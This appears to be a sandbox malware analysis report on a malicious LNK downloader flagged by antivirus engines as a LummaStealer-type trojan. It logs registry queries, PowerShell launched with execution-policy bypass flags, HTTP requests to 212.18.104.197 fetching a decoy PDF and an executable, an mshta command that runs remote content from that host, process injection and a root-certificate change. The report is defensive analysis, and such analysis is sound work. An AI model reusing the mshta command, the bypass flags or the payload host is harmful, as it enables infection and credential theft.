regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2820
process_handle: 0x00000348
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2820
process_handle: 0x00000348
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2864
process_handle: 0x00000348
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2864
process_handle: 0x00000348
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2988
process_handle: 0x00000204
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2988
process_handle: 0x00000204
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2164
process_handle: 0x00000204
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2164
process_handle: 0x00000204
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2236
process_handle: 0x00000554
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2236
process_handle: 0x00000554
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2440
process_handle: 0x00000554
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2440
process_handle: 0x00000554
1 0 0
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Roaming\TopNotchSetupPacket.pdf"
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
host 212.18.104.197
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002e4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
file C:\Users\test22\AppData\Roaming\TopNotchSetupPacket.pdf
file C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: GET /TopNotchSetupPacket.pdf HTTP/1.1 Host: 212.18.104.197 Connection: Keep-Alive
socket: 1320
sent: 87
1 87 0

send

buffer: GET /AdeptTranslatorPro_%5B3MB%5D_%5B1sig%5D.exe HTTP/1.1 Host: 212.18.104.197
socket: 1320
sent: 83
1 83 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: GET /20/rdr/ENU/win/nooem/none/consumer/280_20_6_20042.zip HTTP/1.1 Accept: */* If-Modified-Since: Tue, 30 Jul 2024 04:04:23 GMT User-Agent: IPM Host: acroipm2.adobe.com Connection: Keep-Alive Cache-Control: no-cache
socket: 1316
sent: 226
1 226 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: GET /20/rdr/ENU/win/nooem/none/consumer/278_20_6_20042.zip HTTP/1.1 Accept: */* If-Modified-Since: Tue, 30 Jul 2024 04:04:23 GMT User-Agent: IPM Host: acroipm2.adobe.com Connection: Keep-Alive Cache-Control: no-cache
socket: 1264
sent: 226
1 226 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: GET /20/rdr/ENU/win/nooem/none/consumer/281_20_6_20042.zip HTTP/1.1 Accept: */* If-Modified-Since: Tue, 30 Jul 2024 04:04:23 GMT User-Agent: IPM Host: acroipm2.adobe.com Connection: Keep-Alive Cache-Control: no-cache
socket: 1340
sent: 226
1 226 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: GET /20/rdr/ENU/win/nooem/none/consumer/277_20_6_20042.zip HTTP/1.1 Accept: */* If-Modified-Since: Tue, 30 Jul 2024 04:04:23 GMT User-Agent: IPM Host: acroipm2.adobe.com Connection: Keep-Alive Cache-Control: no-cache
socket: 1356
sent: 226
1 226 0

send

buffer: !
socket: 1116
sent: 1
1 1 0

send

buffer: GET /20/rdr/ENU/win/nooem/none/consumer/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Fri, 30 Jul 2021 19:28:16 GMT User-Agent: IPM Host: acroipm2.adobe.com Connection: Keep-Alive Cache-Control: no-cache
socket: 1316
sent: 219
1 219 0

send

buffer: !
socket: 1116
sent: 1
1 1 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe"
parent_process powershell.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Roaming\TopNotchSetupPacket.pdf"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\TopNotchSetupPacket.pdf
parent_process acrord32.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
parent_process powershell.exe martian_process "C:\Windows\system32\mshta.exe" http://212.18.104.197/SetupPacket
Process injection Process 1572 resumed a thread in remote process 2148
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2148
1 0 0
option -ep unrestricted value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -ep unrestricted value Attempts to bypass execution policy
option -nop value Does not load current user profile
Lionic Trojan.WinLNK.Pantera.4!c
Malwarebytes Trojan.Downloader.Generic
VIPRE Heur.BZC.YAX.Pantera.41.184569BA
Arcabit Heur.BZC.YAX.Pantera.41.17F1705C
Symantec CL.Downloader!gen111
ESET-NOD32 LNK/Agent.OQ
Avast LNK:Agent-JF [Trj]
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.41.184569BA
MicroWorld-eScan Heur.BZC.YAX.Pantera.41.184569BA
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft Heur.BZC.YAX.Pantera.41.184569BA (B)
TrendMicro Trojan.LNK.LUMMASTEALER.YXEG5Z
FireEye Heur.BZC.YAX.Pantera.41.184569BA
Sophos Troj/LnkRun-EZ
Google Detected
MAX malware (ai score=81)
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:PowerShell/ForExec!MTB
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Pantera.41.184569BA
Varist LNK/Agent.FZ.gen!Eldorado
Tencent Win32.Trojan.Agent.Vwhl
huorong TrojanDownloader/LNK.Agent.da
Fortinet LNK/Agent.ACX!tr
AVG LNK:Agent-JF [Trj]
alibabacloud Trojan:Win/ForExec.Gen
count 7595 name heapspray process powershell.exe total_mb 474 length 65536 protection PAGE_READWRITE
count 51 name heapspray process powershell.exe total_mb 335 length 6889472 protection PAGE_READWRITE
file C:\Windows\System32\mshta.exe
file C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
file C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe